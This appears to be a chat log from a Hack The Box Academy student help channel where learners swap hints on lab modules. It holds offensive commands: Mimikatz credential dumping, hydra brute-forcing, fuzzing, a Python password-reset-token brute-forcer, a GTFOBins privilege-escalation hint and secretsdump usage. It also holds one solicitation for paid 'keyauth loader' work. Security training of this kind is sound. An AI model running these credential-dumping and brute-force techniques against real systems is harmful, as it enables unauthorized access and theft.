Does look like in the code that upon completion of a module, you are rewarded with cubes. If you think something doesn't look right, please do reach out to our support team @kind saddle . They'll be back on Monday 🙂
have you tried fuzzing?
oops
I tried to put a spoiler thing
and it sent it to the bot as a report
sry ><
was not intentional
sorry!
Heh no problem
So long as you're not sharing direct solutions with others for active content, it's all good
It's quite direct..
A nudge in DM might be a better idea, but mentioning the intended vulnerability is quite the spoiler imho
Think how to direct, without pointing to the answer 🙂
ok 🙂
Cheers!
sorry for the late response, but if you didn't finish that section then hint: you can base your exploit on the one shown in the ||SOAPAction Spoofing|| section (for the intended way)
ok, thanks
Oh, I see. I used the automate.py to gain rce and access the db that way but I don't think that is intended. thanks for the tip!
I could see here why the cube didn't come, it doesn't complete a class, but thanks
or if you already got RCE you also can get the flag some where in the ||web root||
🙂
I'm having trouble in Getting Started // Nibbles - Initial Foothold. I have obtained the user.txt flag but the assessment answer box won't accept the answer. Has anyone else come across this issue?
Worked out the issue, it wants me to submit the flag of the target spawned in Academy, not the regular HTB labs box. I'll keep this in mind in the future.
<h1>Hello Hi</h1>
i have got the solution for this section of DNSAdmin using the dll provided in the tools folder.. it is not a bug: once you manage to get the user added you need to log off and then log back in. you can use the cmd command: shutdown -l
i think it is a normal thing that you need to log off at this stage since the user settings will need to be loaded again...
🤙🏻
Hey guys in the Linux module and I keep getting errors when trying to use the wget or now systemctl commands?
Requires authentication and I don't know the password for the HTB user
Anyone at zap scanner module?
htb[/htb]$ systemctl start ssh - this is the line that requires authentication - can someone help me
@vocal apex The desktop should contain a file called credentials
hi
I detected an entry in smb.conf (minimum protocol). Probably from other CTF. I deleted it and I update the system. Now it works.
Thanks @unreal patio
Use the "systemctl" command to list all units of services and submit the unit name with the description "Load AppArmor profiles managed internally by snapd" as the answer.
I've used
systemctl list-units --type=service | grep AppArmor
Which returned
apparmor.service
This is the only service with app armor but the answer is wrong?
Is there a better place to ask these questions - I don't want to clog up the adults table - with what I feel are very nooby questions
@vocal apex which section and question is this?
service and process management in linux basic
You are quite close to the answer
When you fill in the query you posted above you get two results
Try the second one instead of the first one
oh wow that worked, nice, and good catch, they should put this in the module
👍
yes lovely hahah thanks agreed they should update the module
It won't let me message you
Same for me, it says you have limited whom can message you
Hello can someone help me for IDOR ; Bypassing Encoded References
👍 thank you re dropping the first 17000. I was giving up on that large list given time constraints, and was also seeing unverified info that copy/pasting the rule from the module was it... I was also considering other users and short lists, etc. etc. ... so I had a huge matrix of potentials... dropping the first 17000 likely got me past the section before 2050 LoL. Thanks again.
np
hy I am new in cyber security and I am in need of help and how to start. I have been able to download kali Linux but I am having some trouble downloading scripts from git hub so if anyone can please walk me through it. thank you.
if you are new to this i'm not sure if it is a good idea to run random code from github without knowing what you are running. also check this video out to see which skills you are missing to start hacking https://www.youtube.com/watch?v=lhz0-qAQlBM
the Web Attacks module? sure what's the issue?
thanks.
also for github you can use git clone to clone the whole github repository, or if you just want to download a single file you can click that file and look for the Download button. if the file you are trying to download just has code you can wget the url
Hi there, could someone give me a hint regarding the Broken Authentication Module -> Predictable Reset Token -> question number 2 (request a reset token for htbadmin to force a password change)? I can decode the temporary password and tamper it but not sure how can I use it to access the htbadmin.
hint use that as ||the password|| ||(after you change the token of course)||
Thanks @vital adder , going to try that!
Anyone having issues with xfreerdp disconnecting the session? It appears my session crashes frequently when doing the Windows modules for password attacks. I know it's not my fiber connection, it seems to disconnect me every 2 min or so
is your pwnbox on at the same time as your vpn?
but when I download a script and I try to install it I get an error on linux. saying cant find this file.
no I rarely use pwnbox, unless the vpn is giving me issues. I get a "network disconnect!" error
so the first thing you need to do is learn how linux work because if you don't know that i can't help you troubleshoot
academy have a free module on this but in the video i send you there is a section of "where to learn linux" or something like
yea try regenerate and new vpn and use that
yh am watching the video.
will do, thanks @vital adder
lately i also have the disconnect and slow network issue regenerate a new vpn help a bit but not much after a while
Password Attacks - PTH module - "Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?"
Are we suppose to use mimikatz to dump the current session hashes? When I use lsadump::lsa or lsadump::sam, the only users returned are admin, guest, default, and wdagutility. I've also used crackmapeec to remotely dump sam and lsa but still can't find David's hash. Any guidance to push me in the right direction?
Is there a way to increase the display size of a remote session in Remmina? trying to read the output of my cmd window on this remote machine and its a couple hundred lines squished into a million lines
@shy warren use sekurlsa::logonPasswords full
hmm any idea why I'm getting this error "ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)"
You need to pass the debug command first
oops, just needed to privilege::debug. Thanks @placid quest
Is there a way to evil-winrm into a local admin account? I've tried both .\Administrator as well as the -r .\ option
Is the use of the MyWorkstation mandatory or does the VPN Connection also work in the academy?
Otherwise a free user just has one shot a day?
Figured out how to make Remmina dynamically alter the resolution of the remote machine. It took me far too long to learn this.
You can use the pwnbox they provide or you can spin up a VM of your choice and openvpn into their network
VPN is free pwnbox is one per day I think for free users, id just spin up your own vpn so you can evaluate if you want to upgrade to a subscription and access the more complicated material
Thanks man 🙂
hello 🙂 one random question i tried looking in the internet but no luck and probably i wont be able to do that but
someone knows how to specify a name for the hydra.restore file ?? im trying to do a script and i need different restore files 🙂 thanks<3<3
in the ffuf model, where does it tell us which ip and port the webserver is supposed to run? nvm you need to start it in the exercise tab
does anyone know what ngrok is?
Can someone tell me why this one worked
|| wfuzz -c -z file,/home/sz/Documents/seclists/Usernames/top-usernames-shortlist.txt --hs "Invalid username" -u "http://134.122.106.163:30327/question1/?Username=FUZZ&Password=dummypass" ||
And this one didnt?
|| wfuzz -c -z file,/home/sz/Documents/seclists/Usernames/top-usernames-shortlist.txt -d "Username=FUZZ&Password=dummypass" --hs "Invalid username" -u "http://134.122.106.163:30327/question1/?" ||
I'm having issues in this section. Any hint?
Im trying to do it by SQLi but it seems imposible :S. Non even SQLmap
First is a GET request and second is POST. It must have needed a GET. You can also leave off that ? at the end of your post example because it isn’t doing anything
thanks for the explanation
yw
need help attacking common applications skills assessment 2. have all the answers but cant figure out the url to wordpress
oh this is dumb the answers need to have http://(domain) and without a / at the end
hint: you can base your exploit on the one shown in ||SOAPAction Spoofing||, but for ||logging in|| that's where the ||sql injection|| comes into place
thanks, done. lol
When we use Rubeus we get a base64 key instead of the aes key is there a way to get the aes key? When I decode it I get garbage that can't be used to pth
I've already solved the page, just trying to dig deeper
Hey guys, maybe i´m stupid, but i´m stuck on "Active Infrastructure Identification" question 2. I don´t get how i can look for vhosts with whatweb.
I entered the passive command and still got the same result.
Footprinting Lab - Easy
Having issues using the dir and ls command
any suggestions?
Try to use ls -la command
You sexy bitch
Thank y’all for this ^
You were on footprinting easy as well?
i'm mounted to NFS share. I cat the file but it doesn't show anything. What do i need to do?
Yes I am casually working on it. Managed to ssh in after getting the creds off the ftp server. I uploaded linpeas.sh and gonna try to get privilege escalation based upon the CVEs it showed the box to be vulnerable to. .bash_history shows the flag.txt file was made and moved to the root directory.
are you sure the file in question had anything in it to cat
oh brother. Are you saying i have to cat all files until something shows?
look at the file sizes
ohhh la la
i had to ls -la to see that. thanks foxyboxy
Hey guys I'm new to ethical hacking and the stuff I'm reading in these modules aren't making any sense
which module and what doesnt make sense
you may need to brush up on your computer foundations first
esp Linux
@hazy grotto I currently stopped working on it but would you mind in the future if I dm you?
No problem. Whenever I'm on I will try to help.
I started footprinting before doing fundamentals.... Just finished fundamentals and came back to this...... This advice is soo good. almost makes too much sense.
I was mainly referring to Manny Sosa, but yeah wouldnt hurt
over half my flags from the hacktheboo ctf came down to just knowing basic linux tools
I would start with the fundamentals modules and the intro to infosec path
What did i just miss?
just a normal scam
Hey I need help with this Q: "Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>)" I found the root creds and I logged into mysql, I put the root creds as the answer and it's incorrect, am I missing something?
Usually helps to put Module name and then the section. then the question
Ur right, sry is in Password Attacks - Password Reuse / Default Passwords
oh hint ||the cred is in one of the link||
can i dm you?
not atm, Im about to buckle down doing my own thing here
roger
I started linux Fundamentals and aside from learning the basics I'm completely lost. It's like the reading portion doesn't correlate with the questions bring asked.... Am I missing something ? Am I supposed to open up my kali linux terminal as I go along ?
I'm on Service and Process Management
yeah you should absolutely be following along with the module. Get those muscle memory going
why is it that \n = %0a , but when I encode the actual \n it is something else?
How are you encoding it?
with URL through burp
What is it encoding as with the unexpected result? I guess %5Cn?
its giving me %5c%6e
Yeah.. literal value of the string \n
Instead of the interpreted value of the escape \n, which is a newline, aka %0a
i see. I was so confused because all the other injection operators matched a URL encoding except that one --- thanks for the help
No worries 🙂
Hi guys 🤗.. anyone help me with this Q in the ffuf module, what filter should I use because I'm getting a lot of results
Try running a VHost fuzzing scan on 'academy.htb', and see what other VHosts you get. What other VHosts did you get?
I used this command
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs 900
are you writing the address correctly ? i see you have a /:PORT .... and also, for me, once it started running and i saw the filter size, i stopped and adjusted
Yes I have port 31577 it correct
Is this the correct command to connect RDP?
I'm trying to RDP into medium lab and having such a hard time. Not sure if it's installed correctly, wrong creds or wrong command
footprinting medium lab
with no "/" right haha sorry just making sure
no / lol really?
I see that now.
@sly tapir
What filter do you think I should to use
dm me a screenshot...i did this module like 2 weeks ago
Alright 👍
Hello everyone! I need help with Brute Forcing Skills Assessment - Web, first question (When you try to access the IP shown above, you will not have authorization to access it. Brute force the authentication and retrieve the flag). I have spent like 3 days trying to find the password. my understanding here is the user must be b.gates and my command is the following (hydra -l b.gates -P /usr/share/wordlists/rockyou.txt -f 134.122.106.163 -s 31793 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='log-in'"). it is not clear how u should solve it, if someone could give me a hint I would appreciate it a lot 😅
On Password Attacks PtT, I'm able to get the hash 256 hash for svc_workstations but I can't find the ntlm hash to crack and get the password. Can someone point me in the right direction? I tried forging a ticket but im not sure how to use that to privilege escalate on a linux machine.
I figured it out, was easy I was just looking down the wrong rabbit hole
You need to use sql manager studio program and think I followed steps in this article to show last 200 users. https://www.patrickkeisler.com/2019/05/management-studio-edit-top-200-rows/
Yes did that format and it worked.
Hello I need help on section Password Attacks - Password Reuse / Default Passwords, I found the root creds but idk what is the correct answer
oh wait i didn't realize they also updated that section but previous apply that also you ||can't find the cred on the target machine||
shoot me a dm if you still need help with that
Is anyone able to help with the CPTS Getting Started - Knowledge Check assessment?
I have gained the initial reverse shell and obtained the user.txt flag but I am having trouble escalating my privileges. I can see that I have sudo access to /usr/bin/php but can't work out how to use that to gain root privileges.
hint use ||gtfobins||
Hello hello and best regards
Thank you @vital adder, I got the flag!
hi guy, any tip on getting through no nut november?
MRtom this will be impossible for your squriily but
hi guys! can't seem to crack the aes256 hash in the Pass the Ticket Linux section of Passwords Attacks, any help
i don't think you can crack that hash and ||hint you can crack all crackable hash on crackstation||
Yea so far i got david, carlos, and john's passwords. I can impersonate svc_workstations but haven't got any luck cracking this pass. I may be lookin at the wrong thing tho
also are you on question 5?
yea
so i'm pretty sure i have a typo or something in my note for this one but you can ||basically do the same thing as the last question|| and if you did dump the hash try cracking i think ntlm hash or something like that not aes256 one
yea that was my first line of thought since it asks to use ssh to login as svc_ but using the keytabextract it doesn't find an RC4/NTLM hash
like i have this constant feeling that the answer is very very simple and i'm simply too dumb to see it

yea.... do an ls on that directory and try with other file that have ||similar name|| as that one
Today we have learned a very valuable lesson in life kids
Always ls -la the directory
and if you feel you're dumb
thats because you are
thx a bunch man
Would I receive any certificate after completing a module?
I don't think you do i may be wrong tho, but you can after you finish a path i.e "Penetration Tester"
and you can get a Student Transcript via Settings
Hi, I'm doing the password attacks, cracking linux passwd shadow and whatnot and I have a problem. I've successfully retrieved the passwd.bak and shadow.bak but when I run them through unshadow, the output file is identical to the shadow file
and therefore I can't crack it with hashcat
has anyone ever encountered this problem?
@pliant sage use john
i just tried
doesn't work
i ran this command: john --wordlist /usr/share/wordlists/rockyou.txt unshadowed.hashes
oh wait actually I think I made a mistake
I've officially completed every module on Academy. It's been fun
Shoutout to the module creators. Slightly expensive content but high-quality training for the most part
And for some reason my dashboard hasn't updated in a while. It should say 100% for everything
congrats
Hlo
o7 HTB I'm stumped for tonight @>@ and I must place this on hold until tomorrow...but i need some guidance on this question with in "Footprinting>Host Based Enum>DNS" with the " What is the FQDN of the host where the last octet ends with "x.x.x.203"? "
I have tried
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/sortedcombined-knock-dnsrecon-fierce-reconng.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-20000.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-110000.txt
And have run these bash scripts & dnsenum against all 3 aswell as have referenced https://forum.hackthebox.com/t/hack-the-box-academy-footprinting-dns-enumeration/250408
Gl
Yup
dope thx
how to do this and what r u doing can yall teach me?
Can someone help me why is Session Security: Skills Assessment website not opening for me, what am I missing? :
I checked and the minilab is there on the list, any idea why is it not working for me?
Hi! Does anybody remember about it and is willing to help me with Footprinting module/medium lab?
@rustic sage Can you be a bit more specific with your question?
Yes. I am inside the MSSMS. I don't know on which database to use the "edit 200 entries on a specific database" hint provided, to find the HTB account that I'm asked for. I've seen some hints like <SELECT * FROM DB_NAME_FOUNDED WHERE USERNAME_COLUMNS like “%HTB%">, but I'm still dumb 🙂
@rustic sage Was getting lunch 😛
select * from accounts.dbo.devsacc where name = 'htb';
Try that query
@unreal patio Thank you! This way I learned how to use a query. This is my first experience with SQL. Problem solved!
🙂
Hi guys, I'm following the Network Enumeration module, host discovery - and I am getting a different terminal output from my Nmap scan then the example. My Nmap seems to not be doing ARP ping scans.
Here is the example:
And this is my output:
can u guys suggest some boxes after completing the Information Gathering - Web Edition module in academy? cause academy did not suggest any. for footprinting it did
hello,
doing this
https://academy.hackthebox.com/module/147/section/1391
been running hydra with the custom password list for nearly 2 hrs.....
how longs it supposed to take?
are you using the mutation wordlist?
yes
hydra -l sam -P mut_password.list ssh://x.x.x.x
try -t 64 and -V, also recommend using your own vm and not pwnbox for this
no vm. hardware. ill try with what you said
Can need some help with Predictable Reset Token Question 1
This is the script im using
```python
from hashlib import md5
import requests
from sys import exit
from time import time
import datetime

url = "http://138.68.181.31:31259/question1/"
header = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Content-Type": "application/x-www-form-urlencoded"}
now = int(1667830437)
start_time = now
fail_text = "Wrong token"
user = "htbadmin"
endtime = now + 1000
for x in range(start_time - 1000, endtime):
    raw_data = user + str(x)
    md5_token = md5(str(raw_data).encode()).hexdigest()
    data = "token={md5_token}&submit=check"
print("checking {} {}".format(str(x), md5_token))
res = requests.post(url, data=data, headers=header)
if not fail_text in res.text:
    print(res.text)
    print("[*] Congratulations! raw reply printed before")
    exit()
exit()
```
data ="token={md5_token}&submit=check"
you're missing an f at the start of your f-string
also that data is never used and just rewritten until the loop ends
for x in range(start_time-1000, endtime):
    raw_data = user+str(x)
    md5_token = md5(str(raw_data).encode()).hexdigest()
    data =f"token={md5_token}&submit=check"
is it good now?
sure but you still never use data outside the loop
need someone who knows keyauth (i need cmd keyauth loader with hwid) DM ME good money to make
My coding skill is not that great. I tried with the indentation. It didn't work
sorry I stopped the convo mid way I'm in a meeting
ok I fixed the code i think
but like you probably wanna send a request for each token you create
that's the main issue in your code
Ok After fixing the code it's working
Also Anyone looking at this in future you have to use milliseconds
when I run secretsdump.py, it dumps all hashes including the krbtgt account but when i specify -just-dc-user krbtgt it cant find the account.. any ideas why this would be or how i can just pull down the krbtgt hash without printing the hundreds/thousands of other users?
anyone for web services/api module? having issues with sqli payload
still going..........................
how lol
no idea man..... bored of this part of the module now.
What am i doing wrong?
there was one question in that module that I had to delete the first 17000 passwords from the list in order to crack it in time.
this module gave me the most headache..
SAME!!
sounds like you had a fun time figuring that out.........
Can i ask the fast way of deleting 17000 passwords please?
sed -e 1,17000d mut_password.list > short.txt
I opened the list in mousepad
ewww
sed is much easier
currently doing web service and api attacks and i feel like i've wasted £9
what are you stuck on? I have finished that one
hey guess what?
Its DONE.......... it took less than 20 seconds after deleting the first 17000 passwords.
nice haha
finished that question. it was super easy.......... why 17000 passwords... ahhhhh i been sitting here for hours!!!!!!!
thank you @fierce sparrow @lethal atlas
no worries
17000 was just a number to eliminate the majority. Could have really been anything
i am just surprised that as its only an example exercise that they set it up that way........ cracking that in 20 mins would have been sufficient imo. teach the method and a small amount of patience.
Can someone help me understand why the MAC addresses are not showing up and my Nmap is not doing ARP scans?
I have run nmap in sudo
agreed
this next one isnt great either lol. mysql creds now lol. here we go
this entire module is a test of patience. Start hydra, walk away for a bit and come back later lol
@stuck hull dm me and I will try to help you
righty o lol. thanks man
ya dont need hydra for the mysql part
Hi there,
Section Web Attacks, Chaining IDOR vulnerabilities.
The question at the end is "Try to change the admin's email to 'flag@idor.htb', and you should get the flag on the 'edit profile' page."
So i have changed the admin email to what is mentioned, but requesting the info afterward i don't get any flag as it should. In case i am missing something could you give me a hint? Thanks in advance.
dm me
idk its saying session completed
maybe rockyou aint the list ya need to use then
Tried a mutated list and it also stops at 01 seconds
can try the unmutated list for completionist sake too. I dont recall running into any issues on that module, are you using your kali or the pwnbox?
pwnbox
I'm rebuilding john to see
I downloaded the github but the run folder didnt have zip2john
I used the pwnbox for that too but didnt need to download or build anything
Did you edit the hash you got out of zip2john?
I dont believe so
😐
Why is it all fucky for me then :\
Am I supposed to get the zip out of the root folder or is documents fine?
Module Local File Inclusion, Remote File Inclusion (RFI) ...I can't connect to the webpage?
but there is only a IP and no port when i spawn the target? Is that supposed to be so?
idr but I also dont remember there being multiple zips either
haven't done that module specifically, but there are two types of spawns, the docker spawns that give you just an ip and port and then the box spawns that don't give you a port which is normal.
in which case the webserver is typically on a default port, or youre supposed to scan the box to find the port
the box spawns btw you have to either use the pwnbox or connect to the VPN for, whereas the dockers can sometimes(always?) be reached publicly
ok now it works...I generated a new vpn key... 😉
I am dumb
I'm trying to do the optional exercises of Password Attacks - PtT but when I try to connect from my host I get the following error.
Is it because im using a bad ticket? I tried taking the one used that worked from the linux machine as well as from windows through rubeus. I get the same error, did I set up my proxy wrong or am I missing something?
Today I joined the academy, did the first module and i already feel welcomed, motivated and inspired.
Tomorrow we'll make more progress.
what was it?
@waxen current Welcome to the team!
looks like your proxychains didnt work, did you setup your tunnels correctly?
Thanks so much.
I believe so I can see on windows as well as on my proxychain that its connected
thats chisel connected but that doesnt mean proxychains is connected
chisel doesnt often listen on 9050 for a reverse tunnel like that
and also if proxychains did connect, youd have more log stuff from chisel there
@thorn urchin Just had to use the full mutated list
I thought the wordlist was not working out due to the speed
yup so you need to change your proxychains conf to point at localhost 1080
oof, I understand how that mistake can happen lol. I think that module needs some speed tweaks so students dont need to take shortcuts that can bite em
thatd do it. remember the chain part of proxychains is that it will chain different proxies together. if an element of the chain doesnt actually exist then itll fail. Its not like a dns list where it just skips to the next one.
Thanks, but now im at a new error lol
but thats progress!
[proxychains] Strict chain ... 127.0.0.1:1080 ... ms01:445 ... OK
[-] ('unpack requires a buffer of 4 bytes', "When unpacking field 'length | !L=0 | b''[:4]'")
How did you end up making it run faster? I ended up breaking it into chunks but that still took an entire evening.
For the zip?
probably used better chunks for that section 😛
Whoops thats the next section for me, I thought you were talking about when it first introduces mutated list and you have some 17000 passwords
😛
Anyone here who can give me a hint on "Active Subdomain Enumeration"?
What is the proof text displayed in the Target website you browsed?
in the Introduction to academy module, I try to connect to a docker target but all I get is an error screen that says Error code: SSL_ERROR_RX_RECORD_TOO_LONG
I dont know what Im doing wrong
Does anyone know what is the password of our htb instance on the htb academy website ? I tried my account password but it does not work
When i try to sudo in the instance it asks me a password
afaik there should be a text file somewhere with the password in it
Yes, I reset the instance and the credential.txt appeared, thanks !
@silver iris what is the problem
Any new modules coming soon? @blissful verge
Hi everyone from the BloodHound Module - Analyzing BloodHound data, did anyone face a problem with zip files? I tried from version 3.0.5 to latest 4.2.0 and all show up message BAD JSON FILES.
yes, dm me